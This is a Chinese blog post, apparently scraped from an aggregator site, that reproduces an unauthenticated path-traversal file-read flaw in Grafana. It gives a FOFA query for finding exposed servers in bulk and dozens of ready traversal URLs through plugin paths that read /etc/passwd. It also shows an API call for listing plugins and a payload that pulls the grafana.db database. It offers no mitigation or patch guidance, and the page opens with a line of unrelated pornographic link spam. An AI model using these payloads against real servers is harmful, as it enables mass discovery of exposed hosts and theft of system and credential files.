日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Grafana 未授权任意文件读取漏洞复现

發布時間:2024/3/24 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Grafana 未授权任意文件读取漏洞复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1.fofa 批量搜索

app="Grafana"

漏洞URL:

{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd

2.獲取遠程目標linux系統的/etc/passwd密碼信息

/public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertmanager/../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../etc/passwd /public/plugins/canvas/../../../../../../../../etc/passwd /public/plugins/cloudwatch/../../../../../../../../etc/passwd /public/plugins/dashboard/../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../etc/passwd /public/plugins/debug/../../../../../../../../etc/passwd /public/plugins/elasticsearch/../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../etc/passwd /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd /public/plugins/grafana/../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../etc/passwd /public/plugins/graphite/../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../etc/passwd /public/plugins/influxdb/../../../../../../../../etc/passwd /public/plugins/jaeger/../../../../../../../../etc/passwd /public/plugins/live/../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../etc/passwd /public/plugins/loki/../../../../../../../../etc/passwd /public/plugins/mixed/../../../../../../../../etc/passwd /public/plugins/mssql/../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../etc/passwd /public/plugins/opentsdb/../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../etc/passwd /public/plugins/postgres/../../../../../../../../etc/passwd /public/plugins/prometheus/../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../etc/passwd /public/plugins/tempo/../../../../../../../../etc/passwd /public/plugins/testdata/../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../etc/passwd /public/plugins/xychart/../../../../../../../../etc/passwd /public/plugins/zipkin/../../../../../../../../etc/passwd

3.常用的插件列表

http://x.x.x.x:3000/api/plugins?embedded=0

alertlist annolist grafana-azure-monitor-datasource barchart bargauge cloudwatch dashlist elasticsearch gauge geomap gettingstarted stackdriver graph graphite heatmap histogram influxdb jaeger logs loki mssql mysql news nodeGraph opentsdb piechart pluginlist postgres prometheus stat state-timeline status-history table table-old tempo testdata text timeseries welcome zipkin

4.遠程讀取數據庫信息

/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

4.Fuzz Success

/public/plugins/alertGroups/../../../../../../../../etc/passwd /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../etc/passwd /public/plugins/canvas/../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../etc/passwd /public/plugins/debug/../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../etc/passwd /public/plugins/live/../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../etc/passwd /public/plugins/xychart/../../../../../../../../etc/passwd

總結

以上是生活随笔為你收集整理的Grafana 未授权任意文件读取漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。